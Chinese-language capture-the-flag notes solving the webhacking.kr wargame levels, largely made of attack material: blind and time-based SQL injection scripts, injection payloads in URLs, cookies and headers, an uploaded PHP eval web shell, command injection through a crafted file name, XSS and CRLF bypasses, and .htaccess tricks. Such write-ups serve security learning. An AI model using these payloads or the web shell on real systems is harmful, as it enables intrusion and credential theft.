level1
if(eregi("[^0-9,.]",$_COOKIE[user_lv])) $_COOKIE[user_lv]=1;//cookie[user_lv]不是数字和小数点,则值为1
if($_COOKIE[user_lv]>=6) $_COOKIE[user_lv]=1;//大于等于6,值为1
if($_COOKIE[user_lv]>5) @solve();//大于5小于6,则通关
修改cookie[user_lv]=5.5
level2
index.php的源码发现:
cookie中发现time
当修改cookie[time]为1538965314 and 1 和1538965314 and 0时分别表现为
通过测试发现cookie注入
在查看index.php时发现admin/目录
admin页面有一个输入框,需要密码才能进入,通过cookie盲注获取密码
通过设置 cookie[time]=1538965314 and length((select password from admin))>0,根据index.php的源码:2070-01-01 09:00:01,发现存在admin表和password字段。
1538965314 and length((select password from admin))=10 密码长度为10
import requests
import string
s=string.printable
url='http://webhacking.kr/challenge/web/web-02/index.php'
cookies={'PHPSESSID':''}
password=''
for i in range(1,11):
for j in s:
payload='1538965314 and ascii(substr((select password from admin),{0},1))={1}'.format(i,ord(j))
cookies['time']=payload
r=requests.get(url,cookies=cookies).content
if '2070-01-01 09:00:01' in r:
password+=j
print password
break
得到一个提示:@dM1n__nnanual
在http://webhacking.kr/challenge/web/web-02/bbs/read.php?No=1页面发现密码框。表名是:FreeB0aRd,字段名是:password
将上面的py脚本中的admin改为FreeB0aRd,可获得password
payload='1538965314 and ascii(substr((select password from FreeB0aRd),{0},1))={1}'.format(i,ord(j))
输入密码可以获得一个加密的zip文件,使用admin给我们的提示就可以通关。
level3
拼图游戏:
获得一个输入框,有隐藏的表单
<input name="answer" value="1010100000011100101011111" type="hidden">
修改value=1010100000011100101011111||1 绕过黑名单进行注入
level4
一次base64 解码,二次md5解密。
level5
点击login进入登录页面
发现http://webhacking.kr/challenge/web/web-05/mem/目录泄露
发现join.php,页面源代码发现script脚本
document.write('<form method=post action='+llllllllll+lllllllllllllll+lllllllll+llllllllllllll+li+llllllllllllllll+llllllll+llllllllllllllll
+'>');document.write('<table border=1><tr><td><font color=gray>id</font></td><td><input type=text name='+lllllllll+llll+' maxlength=5></td></tr>');document.write('<tr><td><font color=gray>pass</font></td><td><input type=text name='+llllllllllllllll+lllllllllllllllllllllll+' maxlength=10></td></tr>');document.write('<tr align=center><td colspan=2><input type=submit></td></tr></form></table>')
把这段js扔到浏览器执行可以看到注册的输入框。
注册一个admin+多个空格+a的用户
admin%20%20%20%20%20%20%20%20%20%20%20%20a
然后进入login.php登陆通关
level6
index.phps中
$val_id="guest";
$val_pw="123qwe";
将他们改为admin,执行php代码进行20次base64编码,然后替换,再写入cookie。
level7
select lv from lv1 where lv=($go)
?val=-1)union%09select(3-1
select lv from lv1 where lv=(-1)union%09select(3-1)
遇到mod_security
level8
User-Agent: a','1','admin')#
User-Agent: a
insert into lv0(agent,ip,id) values('$agent','$ip','guest')
insert into lv0(agent,ip,id) values('a','1','admin')#','$ip','guest')
select id from lv0 where agent='$_SERVER[HTTP_USER_AGENT]'
select id from lv0 where agent='a'
level9
?no=if(substr(id,1,1)in(0x61),3,0)
条件成立no=3否则no=0
import requests
import string
s=string.printable
cookies={'PHPSESSID':''}
password=''
for i in range(1,12):
for j in s:
url='http://webhacking.kr/challenge/web/web-09/?no=if(substr(id,{0},1)in(0x{1}),3,0)'.format(i,j.encode('hex'))
r=requests.get(url,cookies=cookies).content
if 'Secret' in r:
password+=j
print password
break
level10
id为hackme的a标签有一个onclick事件
if(this.style.posLeft==800)this.href='?go='+this.style.posLeft"
在浏览器的控制台输入
hackme.style.posLeft=799
点击a标签,会自动+1,然后跳转
level11
$pat="/[1-3][a-f]{5}_.*111.54.136.112.*\tp\ta\ts\ts/";
?val=1aaaaa_111a54a136a112%09p%09a%09s%09s
level12
js在浏览器执行
ck="="+String.fromCharCode(enco_(240))+String.fromCharCode(enco_(220))+String.fromCharCode(enco_(232))+String.fromCharCode(enco_(192))+String.fromCharCode(enco_(226))+String.fromCharCode(enco_(200))+String.fromCharCode(enco_(204))+String.fromCharCode(enco_(222-2))+String.fromCharCode(enco_(198))+"~~~~~~"+String.fromCharCode(enco2)+String.fromCharCode(enco3);
alert("Password is "+ck.replace("=",""));
level13
通过?no=if((select%0Acount(flag)%0Afrom%0aprob13password)in(2),1,0)
得知flag有2个,min(flag),max(flag)分别选中
通过?no=if((select%0Asubstr(min(flag),1,1)from%0Aprob13password)in(0x63),1,0)
获取flag
level14
var ul=document.URL;
ul=ul.indexOf(".kr");
ul=ul*30;
if(ul==pw.input_pwd.value) { alert("Password is "+ul*pw.input_pwd.value); }
password=ul*2
level15
document.write("password is off_script");
level16
if(cd==124) location.href=String.fromCharCode(cd);
location.href=|
level17
level18
?no=-1%0Aor%0A1%0Aorder%0Aby%0Aid%0Aasc
select id from challenge18_table where id='guest' and no=-1 or 1 order by id asc
等价于
select id from challenge18_table order by id asc
level19
level20
lv5frm.id.value="a";
lv5frm.cmt.value="b";
lv5frm.hack.value=lv5frm.attackme.value;
lv5frm.submit()
在一定时间内验证码有效
level21
?no=0||id=0x61646d696e&&pw%0Alike%0A0x6125%23
select * from table where no=0 || id='admin' && pw like 'b%'#
level22
在username输入admin',点击login
出现Warning: mysql_fetch_array()
admin'&&1# 回显Wrong password!
admin'&&0# 回显Wrong
admin'&&pw like 'a%'#
level23
%00截断字符串
?code=<s%00cript>alert(1)%3B<%2Fs%00cript>
level24
extract($_COOKIE);
从数组中将变量导入到当前的符号表
cookie[REMOTE_ADDR]=112277..00..00..1
level25
?file=password.php%00
level26
2次urldecode
?id=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65
level27
0)or%0A1%0Aorder%0Aby%0Aid%0Aasc-- -
level28
hint : .htaccess
echo 'php_flag engine off' > .htaccess
上传 .htaccess 文件让.php文件成为普通的文本文件,访问upload/index.php
它。
bypass mod_security
level29
payload=',(select password from c29_tb),0x3131302e35332e3133362e313132)#
sql语句:insert into table(filename,time,ip) values('',(select password from c29_tb),0x3131302e35332e3133362e3132)#','','')
ip字段需要和自己的ip一致才有回显
level30
mysql_connect()
没有指定数据库的host,username,password
.htaccess可以写入php变量
php_value mysql.default_host "x.x.x.x"
php_value mysql.default_user "root"
php_value mysql.default_password "root"
level31
服务器监听端口10000-10100
nc -l 10014
level32
翻到底部
点击自己的id增加排名,第二次点击,cookie会多一个vote_check项,删掉它继续点击即可。
import requests
url='http://webhacking.kr/challenge/codeing/code5.html?hit={id}'
for i in xrange(100):
requests.get(url,cookies={'PHPSESSID':'{phpsessid}'})
level33
step 1 ?get=hehe
step 2 POST post=hehe&&post2=hehe2
step 3 ?myip={ip}
step 4 :
import requests
import hashlib
import time
url='http://webhacking.kr/challenge/bonus/bonus-6/l4.php'
params={'password':hashlib.md5(str(int(time.time())+1)).hexdigest()}
r=requests.get(url,params=params,cookies={'PHPSESSID':'db32e08496f9f2fc76a35bfcae8d36e8'}).content
print r
step 5 POST kk=md5('user-agent') cookie[test]=md5('remote-addr')
step 6 ?{ip去除.}={ip去除.}
step 7 ?addr=127.0.0.1
step 8 ?ans=acegikmoqsuwy
strp 9 print "answerip/$ip/$answer.$ip";
level34
F12
location.href='Passw0RRdd.pww'
level35
insert into challenge35_list(id,ip,phone) values('$_SESSION[id]','$_SERVER[REMOTE_ADDR]',$_GET[phone])
insert into challenge35_list(id,ip,phone) values('xx','127.0.0.1',1234),('admin',{ip},8888)
?phone=1234),(char(97,100,109,105,110),char(51,49,57,46,51,57,46,49,56,48,46,55,51),8888
level36
.index.php.swp
level37
$f=@fopen("tmp/$file_nm","w");
@fwrite($f,$_SERVER[REMOTE_ADDR]);
把ip写入tmp/tmp-$time
$ck=file("tmp/tmp-$time");
$ck=$ck[0];
$socket=@fsockopen($ck,7777,$errstr,$errno,1);
import requests
import hashlib
import time
url='http://webhacking.kr/challenge/web/web-18/'
filename='tmp-'+str(int(time.time()))
r=requests.post(url,files={'upfile':(filename,'')},cookies={'PHPSESSID':''}).content
print r
level38
插入新行,伪造ip:admin
level39
$_POST[id]=str_replace("'","''",$_POST[id]);
$_POST[id]=substr($_POST[id],0,15);
select 'good' from zmail_member where id='$_POST[id]
//sql语句少一个分号,输入一个分号会被替换为2个。
14个空格+一个单引号'
level40
?no=0||id=0x61646d696e#
获得admin的登录框
0||id=0x61646d696e&&length(pw)=10# 密码长度为10
0||id=0x61646d696e&&pw%0Alike%0Abinary%0A0x6125# 获取密码
level41
$fn=str_replace("<","",$fn);
上传一个文件名为<的文件
copy($cp,"$hidden_dir/$fn");
函数报错,不能把文件复制到目录
Warning: copy()
得到$hidden_dir
level42
查看源码
?down=dGVzdC50eHQ=
?down=base64('test.zip')
level43
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpg//修改此处
#!/usr/bin/php
<?php
eval($_POST[cmd]);
?>
level44
system("echo '$_POST[html]' ");
html='&l's'
system("echo ''&l's'")
命令注入,黑名单绕过
level45
mb_convert_encoding
遇到%aa\'会把\吃掉
?id=%aa' or id=0x61646d696e#&pw=gu
level46
0||id=char(97,100,109,105,110)
level47
mail的多个header以换行分割,cc把这份邮件抄送给其他邮箱
level48
命令注入
上传文件名为 ;ls
的文件
点击delete按钮, rm upload/;ls
level49
0||id=0x61646d696e
level50
?id=q%aa'/*&pw=*/union%0Aselect%0A3%23
level51
$input_pw=md5($_POST[pw],true);
pw传入的是二进制字符。
md5(1839431,true)=�7���ıA@J�'='��
level52
?id=blackJdog%0DSet-Cookies:%20id=blackJdog
%0A LF和%0D CR都可以换行
level53
?val=1 procedure analyse()
level54
修改2处js
aview.innerHTML+=x.responseText;
if(x.responseText=="") alert(aview.innerHTML);
level55
rank.php?score=11111||1%20 limit 2,1 procedure analyse()
找到pAsSw0RdzzzZ字段
substr,mid被过滤
?score=11111||1 and left(pAsSw0RdzzzZ,1) like 0x6325
level56
kk.php
level57
?msg=1&se=if(substr(pw,1,1)=0x61,sleep(5),0)
level58
F12
hackme.swf
level59
insert into c59 values('$_POST[id]',$_POST[phone],'guest')
id=nimda
phone=4,reverse(id)-- -
level60
cookie[PHPSESSID]不能有数字,
$session[id]唯一标识一个用户
当同一个cookie[PHPSESSID]发起多个请求,会等前一个请求结束才执行下一次请求。
用PHPSESSID=bbbb请求会获得1s的时间来访问txt文件。需要用另一个PHPSESSID=aaaa请求url?mode=auth来读取它。
cookie1.py
import requests
url='http://webhacking.kr/challenge/web/web-37/?mode=auth'
for i in xrange(100):
r=requests.get(url,cookies={'PHPSESSID':'aaaa'})
print r.content
cookie2.py
import requests
url='http://webhacking.kr/challenge/web/web-37/'
for i in xrange(100):
r=requests.get(url,cookies={'PHPSESSID':'bbbb'})
print r.content
level61
将admin字符串作为id字段的值
?id=0x61646d696e as id